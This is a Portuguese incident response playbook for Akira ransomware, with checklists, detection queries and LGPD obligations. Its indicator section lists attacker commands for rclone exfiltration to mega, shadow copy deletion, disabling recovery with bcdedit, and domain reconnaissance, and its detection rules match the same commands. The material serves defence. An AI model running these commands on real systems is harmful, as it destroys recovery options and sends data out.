> [!warning] Aviso Importante > Este playbook e um ponto de partida. Deve ser revisado, testado e adaptado ao ambiente da sua organização. O Akira utiliza técnicas agressivas de dupla extorsao - decisoes sobre pagamento ou negociacao de resgate exigem envolvimento imediato do juridico, DPO e executivos. Nao execute acoes de contencao em producao sem autorização do gerente de incidentes. --- ## Visão Geral O [[akira-ransomware]] e um grupo de ransomware-as-a-service (RaaS) ativo desde marco de 2023, responsavel por mais de 300 vitimas documentadas até o final de 2025. O grupo e conhecido por atacar infraestruturas VMware ESXi alem de ambientes Windows, o que amplifica significativamente o impacto de cada ataque. Possui site proprio de vazamentos na dark web onde publica dados das vitimas. **Caracteristicas técnicas do Akira:** - Utiliza **criptografia ChaCha20** para arquivos e **RSA-4096** para proteger a chave simetrica - Extensao caracteristica: **`.akira`** em ambientes Windows; **`.akira`** ou variantes em Linux/ESXi - Deleta shadow copies via `vssadmin` e `wmic` antes de criptografar - Nota de resgate: `akira_readme.txt` em cada diretorio afetado - Exploração primaria via **credenciais VPN sem MFA** - particularmente Cisco ASA/FTD **CVEs mais explorados pelo grupo:** - [[cve-2023-20269|CVE-2023-20269]] - Cisco ASA/FTD SSL VPN (CVSS 9.1) - acesso inicial sem MFA - [[cve-2024-3400|CVE-2024-3400]] - Palo Alto PAN-OS GlobalProtect (CVSS 10.0) - RCE pre-auth - [[cve-2023-48788|CVE-2023-48788]] - Fortinet FortiClientEMS SQL Injection (CVSS 9.8) **Dupla Extorsao:** o Akira exfiltra dados **antes** de criptografar. O site de vazamentos publica nomes das vitimas com amostras de dados como pressao para pagamento. **Relevância LATAM/Brasil:** O Akira realizou ataques documentados contra empresas brasileiras nos setores de saude, manufatura e varejo em 2024-2025. A operação tem afiliados que falam portugues. **Notas relacionadas:** [[akira-ransomware]] - [[cve-2023-20269|CVE-2023-20269]] - [[cve-2024-3400|CVE-2024-3400]] - [[t1486-data-encrypted-for-impact|T1486]] - [[t1490-inhibit-system-recovery|T1490]] - [[healthcare|saude]] - [[manufacturing|manufatura]] --- ## Attack Flow - Ataque Akira ```mermaid graph TB A["🎯 Acesso Inicial<br/>VPN sem MFA / CVE"] --> B["🔍 Reconhecimento<br/>ADRecon, Bloodhound"] B --> C["🔑 Escalada de Privilegios<br/>Mimikatz, Pass-the-Hash"] C --> D["🌐 Movimento Lateral<br/>PsExec, WMI, RDP"] D --> E["📤 Exfiltração de Dados<br/>rclone para cloud ou SFTP"] E --> F["💣 Pre-Criptografia<br/>VSS deletion, defenses off"] F --> G["🔒 Criptografia<br/>.akira extension em Windows+ESXi"] G --> H["💰 Dupla Extorsao<br/>Site de vazamentos ativo"] style A fill:#ff4444,color:#fff style E fill:#ff6600,color:#fff style G fill:#cc0000,color:#fff style H fill:#990000,color:#fff style F fill:#ff9900,color:#000 ``` --- ## Fluxo de Resposta ao Incidente ```mermaid flowchart TD A([" Alerta: .akira extension<br/>ou akira_readme.txt"]) --> B{Validar Ransomware<br/>Akira} B -->|Confirmado| C[DECLARAR INCIDENTE P1<br/>Acionar CISO + IR Lead] B -->|Incerto| D[Análise Rapida - 15min<br/>Buscar IOCs Akira] D --> C C --> E{ESXi Afetado?} E -->|Sim| F[Isolar Hosts VMware<br/>via vCenter imediatamente] E -->|Nao| G[Isolar via EDR<br/>Network Containment] F --> H[Verificar Backups ESXi<br/>Veeam / Nakivo] G --> H H --> I{Exfiltração<br/>em Curso?} I -->|Sim| J[Bloquear rclone e<br/>Conexoes Cloud no Firewall] I -->|Desconhecido| K[Bloquear Egress para<br/>IPs/Dominios Suspeitos] J --> L[FORENSE] K --> L L --> L1[RAM Dump com Magnet] L1 --> L2[KAPE em Sistemas Chave] L2 --> L3[Preservar Logs SIEM 90d] L3 --> M[ERADICACAO] M --> N[Fechar Vetor VPN<br/>Aplicar Patch CVE] N --> O[Habilitar MFA VPN<br/>Emergencial] O --> P[RECUPERACAO<br/>Restore de Backup Limpo] P --> Q([" Incidente Encerrado"]) style A fill:#ff4444,color:#fff style C fill:#ff6600,color:#fff style Q fill:#00aa44,color:#fff style F fill:#cc0000,color:#fff style M fill:#0066cc,color:#fff ``` --- ## Indicadores de Comprometimento ### Pre-Criptografia (Fase de Acesso) ``` # Ferramentas de reconhecimento Akira tipicas nltest.exe /domain_trusts net group "domain admins" /domain AdFind.exe -f "(objectcategory=person)" -csv SharpHound.exe --CollectionMethods All # Indicadores de exfiltração via rclone rclone.exe copy C:\ mega:backup --transfers 32 # Processo rclone.exe com argumentos de cloud storage # Transferencias HTTP/HTTPS em volume para mega.nz, SFTP externo # Deleção de shadow copies (pre-criptografia) vssadmin delete shadows /all /quiet wmic shadowcopy delete bcdedit /set {default} recoveryenabled No ``` ### Extensoes e Artefatos ``` # Windows - arquivos criptografados *.akira # Linux / VMware ESXi *.akira # VMs ESXi: arquivos .vmdk, .vmx, .nvram com extensao renomeada # Nota de resgate akira_readme.txt (presente em cada diretorio afetado) # Wallpaper do desktop alterado para imagem Akira ``` ### IOCs de Rede (Documentados Publicamente) ``` # Dominios C2 Akira documentados por pesquisadores # Sempre válidar no VirusTotal / MISP antes de usar operacionalmente # O grupo rota infraestrutura frequentemente - usar MISP para IOCs atualizados ``` --- ## Consideracoes - Dupla Extorsao > [!danger] Decisao Executiva Obrigatoria > A dupla extorsao do Akira exige decisao executiva imediata. O site de vazamentos publica dados em fases: primeiro aviso, depois amostras, depois dump completo. O tempo entre comprometimento e publicacao varia de 3 a 21 dias. ### Avaliacao de Dados Exfiltrados Verificar prioridade dos dados potencialmente exfiltrados: | Categoria | Impacto Regulatorio | Prazo de Notificação | |-----------|--------------------|--------------------| | Dados pessoais (LGPD) | ANPD - notificação obrigatoria | 72h após confirmacao | | Dados de saude (LGPD sensivel) | ANPD - prioridade maxima | 72h após confirmacao | | Dados financeiros de clientes | BACEN / CVM | Conforme regulação setorial | | Segredos comerciais | Juridico | Decisao interna | | Dados de cartao (PCI DSS) | Bandeiras / adquirentes | Imediato | ### Decisao sobre Pagamento **O pagamento de resgate:** - Nao garante devolução dos dados exfiltrados - Nao garante que o grupo nao publicara os dados - Pode violar sancoes internacionais (OFAC) se o grupo for sancionado - Deve ser avaliado com assessoria juridica especializada em cyber --- ## Ferramentas Recomendadas ### Detecção e Triagem | Ferramenta | Uso | Comando | |------------|-----|---------| | **CrowdStrike Falcon** | EDR - detecção em tempo real, isolamento de host | `falcon-sensor-ctl --containment enable` | | **SentinelOne** | EDR - rollback de arquivos, isolamento | Console: Threat → Isolaté Device | | **Velociraptor** | Hunting em escala - verificar extensao .akira em todos endpoints | `velociraptor query "SELECT * FROM glob(globs='C:/**/*.akira')"` | | **Sysinternals Autoruns** | Identificar persistência Akira | `autorunsc.exe -a * -s -h -c -vt > autoruns.csv` | ### ESXi - Isolamento e Forense | Ferramenta | Uso | |------------|-----| | **vCenter** | Isolar VMs afetadas, snapshots de segurança | | **VMware PowerCLI** | `Stop-VM -VM $vmName -Confirm:$false` para isolar em escala | | **Veeam Backup** | Verificar integridade de backups ESXi | | **esxcli** | `esxcli system maintenanceMode set --enable=true` para isolar host ESXi | ### Forense Geral | Ferramenta | Uso | |------------|-----| | **Volatility 3** | Análise de memoria - extrair chave de criptografia se processo ainda em memoria | | **KAPE** | Triage forense: `kape.exe --tsource C: --tdest evidence\ --target !SANS_Triage` | | **Magnet RAM Capture** | Captura de RAM antes de desligar: `MagnetRAMCapture.exe /accepteula /go` | --- ## Checklist de Contencao > [!danger] Execute na ordem exata - cada passo depende do anterior - [ ] **T+0** - Confirmar extensao .akira ou akira_readme.txt em pelo menos um sistema - [ ] **T+5min** - Declarar incidente P1 e acionar IR Lead e CISO via canal out-of-band (Signal/telefone) - [ ] **T+10min** - Identificar escopo: quantos sistemas, Windows ou ESXi, esta em curso? - [ ] **T+15min** - Isolar hosts afetados via EDR (Windows) - NAO desligar - [ ] **T+15min** - Isolar hosts ESXi no vCenter se VMs afetadas confirmadas - [ ] **T+20min** - Verificar status dos backups imediatamente - estao comprometidos? - [ ] **T+25min** - Identificar e bloquear processo rclone.exe ou transferencias em massa - [ ] **T+30min** - Desabilitar conta(s) usada(s) pelo atacante no Active Directory - [ ] **T+30min** - Revogar todas as sessoes VPN ativas no Cisco ASA/FTD ou Palo Alto - [ ] **T+45min** - Capturar imagem de RAM de sistemas criticos antes de qualquer reinicio - [ ] **T+1h** - Fechar acesso VPN emergencialmente se MFA nao estiver habilitado - [ ] **T+1h** - Acionar juridico/DPO para avaliacao LGPD obrigatoria - [ ] **T+2h** - Relatório de contencao: escopo, sistemas isolados, vetor suspeito - [ ] **T+4h** - Briefing executivo com escopo confirmado e timeline de recuperacao --- ## Checklist de Erradicacao - [ ] Identificar vetor de acesso inicial: CVE de VPN? Credencial comprometida? Phishing? - [ ] Aplicar patch emergêncial do CVE explorado (prioritario antes de reconectar) - [ ] Habilitar MFA em TODOS os accesses VPN - nao reconectar sem MFA - [ ] Mapear movimento lateral via logs de autenticação (EventID 4624, 4648, 4768) - [ ] Verificar tarefas agendadas, servicos novos, WMI subscriptions (persistência Akira) - [ ] Buscar rclone.exe ou ferramentas de exfiltração em todos os sistemas - [ ] Reimaging completo de todos os sistemas confirmadamente comprometidos - [ ] Resetar senha de TODOS os usuarios de dominio (comecar pelos administradores) - [ ] Resetar senha do KRBTGT duas vezes (com 10h de intervalo) para inválidar tickets Kerberos - [ ] Verificar e reparar VMs ESXi afetadas - restaurar a partir de snapshot/backup pre-ataque - [ ] Confirmar que defesas (EDR/AV) estao reativas em todos os endpoints --- ## Checklist de Recuperacao - [ ] Identificar ultimo backup limpo anterior ao comprometimento (via logs de backup) - [ ] Validar integridade dos backups com hashes SHA256 antes de restaurar - [ ] Restaurar em ambiente isolado primeiro - válidar antes de reconectar a rede - [ ] Restaurar sistemas na ordem de prioridade do BCP/DRP da organização - [ ] Para ESXi: restaurar VMs criticas primeiro, válidar funcionamento antes de escalar - [ ] Aplicar todos os patches de segurança antes de reconectar - [ ] Habilitar monitoramento intensivo por 30 dias pos-recuperacao - [ ] Configurar alertas específicos para IOCs Akira no SIEM - [ ] Avaliar dados exfiltrados: foram publicados no site de vazamentos Akira? - [ ] Comúnicar afetados conforme LGPD se dados pessoais foram exfiltrados --- ## Queries de Detecção ### Splunk - Shadow Copy Deletion (Pre-Criptografia Akira) ```spl index=windows EventCode=4688 (CommandLine="*vssadmin*delete*shadows*" OR CommandLine="*wmic*shadowcopy*delete*" OR CommandLine="*bcdedit*recoveryenabled*no*" OR CommandLine="*wbadmin*delete*catalog*") | stats count by Computer, User, CommandLine | sort -count ``` ### Splunk - Detecção de rclone (Exfiltração) ```spl index=sysmon EventCode=1 (Image="*\\rclone.exe" OR CommandLine="*rclone*copy*" OR CommandLine="*rclone*sync*") | table _time, Computer, User, Image, CommandLine | sort -_time ``` ### Splunk - Renomeacao em Massa para .akira ```spl index=sysmon EventCode=11 TargetFilename="*.akira" | stats count by Computer, User, _time | where count > 10 | sort -count ``` ### KQL - Microsoft Sentinel - ESXi VMs com Extensao .akira ```kql DeviceFileEvents | where FileName endswith ".akira" | summarize AkiraFiles = count() by DeviceName, FolderPath, bin(Timestamp, 5m) | where AkiraFiles > 5 | order by AkiraFiles desc ``` ### KQL - Microsoft Sentinel - Acesso VPN sem MFA Fora do Horario ```kql SigninLogs | where AppDisplayName has_any ("Cisco", "VPN", "GlobalProtect", "Pulse") | where AuthenticationRequirement == "singleFactorAuthentication" | where TimeGenerated between (ago(7d) .. now()) | where hourofday(TimeGenerated) !between (8 .. 18) | project TimeGenerated, UserPrincipalName, IPAddress, Location, AppDisplayName | order by TimeGenerated desc ``` ### Sigma Rule - Akira Pre-Encryption Indicators ```yaml title: Akira Ransomware Pre-Encryption Indicators status: experimental description: Detects Akira ransomware pre-encryption pattern including VSS deletion and rclone exfiltration logsource: category: process_creation product: windows detection: selection_vss: CommandLine|contains: - 'vssadmin delete shadows' - 'wmic shadowcopy delete' selection_rclone: Image|endswith: '\rclone.exe' CommandLine|contains: - 'copy' - 'sync' condition: selection_vss or selection_rclone level: high tags: - attack.impact - attack.t1486 ``` --- ## Comúnicação ### Escalonamento Imediato (T+0 a T+30min) | Destinatario | Canal | Conteudo | |---|---|---| | IR Lead | Telefone/Signal | "Ransomware Akira confirmado - acionar P1" | | CISO | Telefone direto | Escopo inicial, ESXi afetado?, backup status | | Juridico/DPO | Canal seguro | Avaliacao LGPD obrigatoria - dados pessoais? | | Executivos | Telefone direto | Apenas quando escopo confirmado | > [!danger] Use canal out-of-band (Signal, telefone) - o email corporativo pode estar comprometido ou monitorado pelo atacante ### Templaté - Notificação Executiva (T+1h) ``` DATA: [data/hora] CLASSIFICACAO: CONFIDENCIAL - INCIDENTE P1 INCIDENTE DE RANSOMWARE - AKIRA SITUACAO ATUAL - Ransomware: Akira (extensao .akira confirmada) - Sistemas afetados: [lista/contagem] - ESXi/VMs afetadas: [sim/nao - quantas] - Status de backups: [status] - Exfiltração de dados: [confirmada/suspeita/negada] ACOES TOMADAS - [N] sistemas isolados via EDR em T+[X]min - VPN bloqueada em T+[X]min - Contas comprometidas desabilitadas - Forense em andamento PROXIMOS PASSOS - Avaliacao LGPD em andamento (DPO) - Timeline de recuperacao: [estimativa] - Proximo updaté: [horario] PONTO DE CONTATO IR: [nome, telefone seguro] ``` --- ## Licoes Aprendidas ### Cronologia do Incidente | Evento | Data/Hora | Responsavel | |--------|-----------|-------------| | Acesso inicial (retroativo) | | | | Movimento lateral detectado | | | | Exfiltração (rclone) | | | | Shadow copies deletadas | | | | Criptografia iniciada | | | | Alerta gerado no SIEM/EDR | | | | Declaracao P1 | | | | Contencao completa | | | | Recuperacao completa | | | ### Metricas de Impacto | Metrica | Valor | |---------|-------| | Dwell time (acesso até criptografia) | | | MTTD - Tempo de detecção | | | MTTC - Tempo de contencao | | | MTTR - Tempo de recuperacao | | | Sistemas Windows criptografados | | | VMs ESXi afetadas | | | Volume estimado de dados exfiltrados | | | Custo total estimado (R$) | | ### Melhorias Recomendadas - [ ] Habilitar MFA em TODOS os acessos VPN sem excecao - [ ] Aplicar patches de VPN (Cisco ASA, Palo Alto PAN-OS, FortiClient) mensalmente - [ ] Implementar backup imutavel (regra 3-2-1-1: 3 copias, 2 midias, 1 offsite, 1 imutavel) - [ ] Segmentar VMs ESXi em rede dedicada com acesso restrito - [ ] Implementar EDR em hosts ESXi (Crowdstrike Falcon for VMware, SentinelOne) - [ ] Exercicio de tabletop de ransomware com foco em cenário ESXi semestralmente - [ ] Monitorar o site de vazamentos Akira como parte da inteligência de ameaças --- ## Referências - [[akira-ransomware]] - perfil completo do grupo e malware - [[cve-2023-20269|CVE-2023-20269]] - Cisco ASA/FTD SSL VPN (CVSS 9.1) - vetor primario Akira - [[cve-2024-3400|CVE-2024-3400]] - Palo Alto PAN-OS GlobalProtect (CVSS 10.0) - [[cve-2023-48788|CVE-2023-48788]] - Fortinet FortiClientEMS SQL Injection - [[t1486-data-encrypted-for-impact|T1486 - Data Encrypted for Impact]] - técnica MITRE ATT&CK - [[t1490-inhibit-system-recovery|T1490 - Inhibit System Recovery]] - delecao de VSS - [[t1133-external-remote-services|T1133 - External Remote Services]] - VPN como vetor - [[t1041-exfiltration-c2|T1041 - Exfiltration Over C2 Channel]] - rclone exfiltração - [[healthcare|setor saude]] - alvo frequente do Akira no Brasil - [[manufacturing|manufatura]] - segundo setor mais impactado no Brasil - [CISA - Akira Ransomware Advisory](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a) - [FBI - Akira Ransomware IOCs](https://www.ic3.gov/) - [Cisco Talos - Akira Analysis](https://blog.talosintelligence.com/) --- *Ultima revisao: 2026-03-27 | Proxima revisao recomendada: 2026-09-27*